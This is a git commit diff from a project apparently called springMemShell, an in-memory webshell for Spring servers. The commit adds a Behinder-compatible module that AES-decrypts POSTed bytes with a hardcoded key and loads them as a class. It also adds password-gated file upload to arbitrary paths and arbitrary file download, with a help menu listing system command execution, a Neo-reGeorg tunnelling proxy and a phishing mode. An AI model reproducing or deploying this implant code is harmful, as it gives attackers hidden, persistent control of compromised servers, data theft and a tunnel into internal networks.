update upload and download

ethushiroha · Apr 13, 2021 · 34c16f9 · 34c16f9
1 parent 099e03e
commit 34c16f9
Show file tree

Hide file tree

Showing 27 changed files with 392 additions and 84 deletions.
diff --git a/.DS_Store b/.DS_Store
diff --git a/springMemShell/README.md b/springMemShell/README.md
@@ -142,3 +142,37 @@ alert(1);
 
 ![image-20210412141215288](https://gitee.com/ethustdout/pics/raw/master/uPic/image-20210412141215288.png)
 
+
+
+## 新功能+4
+
+支持文件上传和下载
+
+### 上传
+
+访问`/?password=stdout&model=file`即可看到文件上传
+
+![image-20210413175757797](https://gitee.com/ethustdout/pics/raw/master/uPic/image-20210413175757797.png)
+
+例如：
+
+-   path： `/tmp/1.js`
+-   file: `Mgo=`
+-   mode: `overwrite`
+
+会把`Mgo=`进行base64解密之后写入`/tmp/1.js`中。
+
+由于文件大小限制，大文件（大于1M）切块之后用append模式进行上传。
+
+
+
+### 下载
+
+`/?password=stdout&model=file&action=download&path=[path]`
+
+就会下载path指向的文件
+
+例如：
+
+-   path=`/tmp/1.js`
+
diff --git a/springMemShell/src/.DS_Store b/springMemShell/src/.DS_Store
diff --git a/springMemShell/src/main/.DS_Store b/springMemShell/src/main/.DS_Store
diff --git a/springMemShell/src/main/java/com/stdout/Models/BehinderShell.java b/springMemShell/src/main/java/com/stdout/Models/BehinderShell.java
@@ -0,0 +1,46 @@
+package com.stdout.Models;
+
+import com.stdout.Utils.Redefine.MyReader;
+import com.stdout.Utils.Redefine.MyRequest;
+import com.stdout.Utils.Redefine.MyServletAttributes;
+import com.stdout.Utils.Redefine.MySession;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+
+public class BehinderShell {
+    class U extends ClassLoader {
+        U(ClassLoader c) {
+            super(c);
+        }
+        public Class g(byte []b) {
+            return super.defineClass(b,0,b.length);
+        }
+    }
+
+    public static boolean isStarted = false;
+
+    public void start(Object servlet) throws Exception {
+        Object request = MyServletAttributes.getRequest(servlet);
+
+        if (MyRequest.getMethod(request).equals("POST")) {
+            /*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
+            String k = "e45e329feb5d925b";
+            Object session = MyRequest.getSession(request);
+            MySession.putValue(session, "u", k);
+            Cipher c = Cipher.getInstance("AES");
+            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
+            Object reader = MyRequest.getReader(request);
+            new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(MyReader.readline(reader)))).newInstance().equals(servlet);
+        }
+
+    }
+
+    public static void run(Object servlet) throws Exception {
+        if (!BehinderShell.isStarted) {
+            new BehinderShell().start(servlet);
+        }
+    }
+}
+
+
diff --git a/springMemShell/src/main/java/com/stdout/Models/FileManager.java b/springMemShell/src/main/java/com/stdout/Models/FileManager.java
@@ -1,10 +1,65 @@
 package com.stdout.Models;
 
+import com.stdout.Utils.Redefine.*;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.nio.ByteBuffer;
+import java.util.Base64;
+
 public class FileManager {
-    public static String download(String path) {
-        String result = "";
+    public static void download(Object response, String path) throws Exception {
+        try {
+            MyResponse.setContentType(response, "multipart/form-data");
+            MyResponse.setCharacterEncoding(response, "utf-8");
+            File file = new File(path);
+            String fileName = file.getName();
+            MyResponse.setHeader(response, "Content-Disposition", "attachment;fileName=" + fileName);
+
+            ByteBuffer br = ByteBuffer.allocate(513);
+            FileInputStream f = new FileInputStream(file);
+            int byteRead = f.read(br.array());
+            while (byteRead > 0) {
+                byte[] data = new byte[byteRead];
+                System.arraycopy(br.array(), 0, data, 0, byteRead);
+                Object outputStream = MyResponse.getOutputStream(response);
+                MyServletOutputStream.write(outputStream, data, 0, byteRead);
+                br.clear();
+                byteRead = f.read(br.array());
+            }
+            f.close();
+        } catch (Exception e) {
+            return;
+        }
+    }
 
+    public static String uploadView() throws Exception {
+        String result = MyReader.readSource("upload.html");
 
         return result;
     }
+
+    public static String upload(Object request) throws Exception {
+        String result = "";
+        try {
+            String path = MyRequest.getParameter(request, "path");
+            String file = MyRequest.getParameter(request, "file").replaceAll("\n", "").replaceAll("\r", "");
+            String mode = MyRequest.getParameter(request, "mode");
+            FileOutputStream f;
+            if (mode.equals("append")) {
+                f = new FileOutputStream(path, true);
+            } else {
+                f = new FileOutputStream(path, false);
+            }
+            f.write(Base64.getDecoder().decode(file));
+            f.close();
+            result += "upload success, you file is at ==> " + path;
+        } catch (Exception e) {
+            result += e.getMessage();
+            e.printStackTrace();
+            result += "upload failed, please check the content";
+        }
+        return result;
+    }
 }
diff --git a/springMemShell/src/main/java/com/stdout/Models/Fish.java b/springMemShell/src/main/java/com/stdout/Models/Fish.java
@@ -1,6 +1,6 @@
 package com.stdout.Models;
 
-import com.stdout.Utils.MyReader;
+import com.stdout.Utils.Redefine.MyReader;
 
 public class Fish {
     public static boolean isWantFish = false;

diff --git a/springMemShell/src/main/java/com/stdout/Models/Helper.java b/springMemShell/src/main/java/com/stdout/Models/Helper.java
@@ -0,0 +1,39 @@
+package com.stdout.Models;
+
+public class Helper {
+    public static String help() {
+        String result = "";
+        result += "models: \n";
+
+        result += "\t 1. exec ==> execute system command\n";
+        result += "\t\t param: cmd\n\n";
+
+        result += "\t 2. exit ==> remove the SpringMemShell\n";
+        result += "\t\t param: \n\n";
+
+        result += "\t 3. fish ==> static fish\n";
+        result += "\t\t action ==> start\n";
+        result += "\t\t\t param: target file\n\n";
+        result += "\t\t action ==> stop\n";
+        result += "\t\t\t param: \n\n";
+        result += "\t\t action ==> show\n";
+        result += "\t\t\t param: \n\n";
+
+        result += "\t 4. proxy ==> Neo-reGeorg proxy\n";
+        result += "\t\t param: \n\n";
+
+        result += "\t 5. file ==> file manager\n";
+        result += "\t\t action ==> upload\n" +
+                "<font color='red'>" +
+                    "Notice: upload file is at (use post)password=stdout&model=file" +
+                "</font>";
+        result += "\t\t action ==> download\n";
+        result += "\t\t\t param: path\n\n";
+
+
+
+
+
+        return result;
+    }
+}
diff --git a/springMemShell/src/main/java/com/stdout/Models/SpringProxy.java b/springMemShell/src/main/java/com/stdout/Models/SpringProxy.java
@@ -1,6 +1,9 @@
 package com.stdout.Models;
 
-import com.stdout.Utils.*;
+import com.stdout.Utils.Redefine.MyRequest;
+import com.stdout.Utils.Redefine.MyResponse;
+import com.stdout.Utils.Redefine.MyServletInputStream;
+import com.stdout.Utils.Redefine.MySession;
 
 import java.net.InetSocketAddress;
 import java.nio.ByteBuffer;
@@ -10,8 +13,8 @@
 import static com.stdout.Utils.B64.b64en;
 
 public class SpringProxy {
-
-    public void doProxy(Object request, Object response) throws Exception {
+    // usage for Neo-reGeorg
+    public static void doProxy(Object request, Object response) throws Exception {
         MyResponse.resetBuffer(response);
         MyResponse.setStatus(response, 200);
         String cmd = MyRequest.getHeader(request, "Clgpbxohhlnb");

diff --git a/springMemShell/src/main/java/com/stdout/Utils/B64.java b/springMemShell/src/main/java/com/stdout/Utils/B64.java
@@ -4,6 +4,9 @@
 
 public class B64 {
     private static char[] en = "1nAo76ptVK5Ja/3gSuErjTqQOmkvyY9XGMdRFzCZDUHPl8f2BhIwxciN4L+0bsWe".toCharArray();
+
+    private static byte[] de = new byte[] {-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,58,-1,-1,-1,13,59,0,47,14,56,10,5,4,45,30,-1,-1,-1,-1,-1,-1,-1,2,48,38,40,18,36,32,42,50,11,9,57,33,55,24,43,23,35,16,21,41,8,62,31,29,39,-1,-1,-1,-1,-1,-1,12,60,53,34,63,46,15,49,54,20,26,44,25,1,3,6,22,19,61,7,17,27,51,52,28,37,-1,-1,-1,-1,-1};
+
     public static String b64en(byte[] data) {
         StringBuffer sb = new StringBuffer();
         int len = data.length;
@@ -36,7 +39,7 @@ public static String b64en(byte[] data) {
         }
         return sb.toString();
     }
-    private static byte[] de = new byte[] {-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,58,-1,-1,-1,13,59,0,47,14,56,10,5,4,45,30,-1,-1,-1,-1,-1,-1,-1,2,48,38,40,18,36,32,42,50,11,9,57,33,55,24,43,23,35,16,21,41,8,62,31,29,39,-1,-1,-1,-1,-1,-1,12,60,53,34,63,46,15,49,54,20,26,44,25,1,3,6,22,19,61,7,17,27,51,52,28,37,-1,-1,-1,-1,-1};
+
     public static byte[] b64de(String str) {
         byte[] data = str.getBytes();
         int len = data.length;

diff --git a/springMemShell/src/main/java/com/stdout/Utils/MyRequest.java b/springMemShell/src/main/java/com/stdout/Utils/MyRequest.java
diff --git a/springMemShell/src/main/java/com/stdout/Utils/MyServletInputStream.java b/springMemShell/src/main/java/com/stdout/Utils/MyServletInputStream.java
diff --git a/springMemShell/src/main/java/com/stdout/Utils/PreDoFilter.java b/springMemShell/src/main/java/com/stdout/Utils/PreDoFilter.java
@@ -1,6 +1,8 @@
 package com.stdout.Utils;
 
-import com.stdout.Models.SpringProxy;
+import com.stdout.Models.BehinderShell;
+import com.stdout.Models.FileManager;
+import com.stdout.Utils.Redefine.MyRequest;
 
 public class PreDoFilter {
     public static String PreDeal(Object request, Object response) throws Exception {
@@ -19,7 +21,7 @@ public static String PreDeal(Object request, Object response) throws Exception {
                 String model = MyRequest.getParameter(request, "model");
 
                 if (model.equals("help")) {
-                    result += com.stdout.springMem.SpringMemModels.help();
+                    result += com.stdout.Models.Helper.help();
                 }
                 else if (model.equals("exec")) {
                     String cmd = MyRequest.getParameter(request, "cmd");
@@ -38,9 +40,31 @@ else if (model.equals("fish")) {
                     }
                 }
                 else if (model.equals("proxy")) {
+                    com.stdout.Models.SpringProxy.doProxy(request, response);
+                    return null;
+                }
+
+                else if (model.equals("file")) {
+                    String action = MyRequest.getParameter(request, "action");
+                    if (action == null) {
+                        result += FileManager.uploadView();
+                    } else if (action.equals("download")) {
+                        try {
+                            String path = MyRequest.getParameter(request, "path");
+                            FileManager.download(response, path);
+                            return null;
+                        } catch (Exception e) {
+                            result += "need param: path";
+                        }
+                    } else if (action.equals("upload")) {
+                        result += FileManager.upload(request);
+                    }
+                }
 
-                    new com.stdout.Models.SpringProxy().doProxy(request, response);
-                    return "No printer\n\n\n";
+                else if (model.equals("Behinder")) {
+                    Class<?> requestContextHolder = Class.forName("org.springframework.web.context.request.RequestContextHolder");
+                    Object servlet = requestContextHolder.getDeclaredMethod("getRequestAttributes", null).invoke(null, null);
+                    BehinderShell.run(servlet);
                 }
 
                 else if (model.equals("exit")) {

diff --git a/springMemShell/src/main/java/com/stdout/Utils/Redefine/MyMultipartFile.java b/springMemShell/src/main/java/com/stdout/Utils/Redefine/MyMultipartFile.java
@@ -0,0 +1,19 @@
+package com.stdout.Utils.Redefine;
+
+import java.io.File;
+
+public class MyMultipartFile {
+
+    public static String getOriginalFilename(Object file) throws Exception {
+        return (String) file.getClass().getDeclaredMethod("getOriginalFilename", null).invoke(file, new Object[] {});
+    }
+
+    public static void transferTo(Object file, String path) throws Exception {
+        File dst = new File(path);
+        file.getClass().getDeclaredMethod("transferTo", File.class).invoke(file, dst);
+    }
+
+    public static boolean isEmpty(Object file) throws Exception {
+        return (boolean) file.getClass().getDeclaredMethod("isEmpty", null).invoke(file, new Object[] {});
+    }
+}
diff --git a/.../main/java/com/stdout/Utils/MyReader.java → ...a/com/stdout/Utils/Redefine/MyReader.java b/.../main/java/com/stdout/Utils/MyReader.java → ...a/com/stdout/Utils/Redefine/MyReader.java
@@ -1,14 +1,15 @@
-package com.stdout.Utils;
+package com.stdout.Utils.Redefine;
 
 import com.stdout.springMem.SpringMemTransformer;
 
 import java.io.BufferedReader;
 import java.io.FileInputStream;
 import java.io.InputStream;
 import java.io.InputStreamReader;
+import java.nio.ByteBuffer;
 
 public class MyReader {
-    // utils
+    // this is for utils
     public static String readFileContent(String file) throws Exception {
         String result = "";
         StringBuffer source = new StringBuffer();
@@ -47,4 +48,9 @@ public static String readSource(String name) {
 
         return result;
     }
+
+    // this is the true function
+    public static String readline(Object reader) throws Exception {
+        return (String) reader.getClass().getDeclaredMethod("readline", null).invoke(reader, new Object[] {});
+    }
 }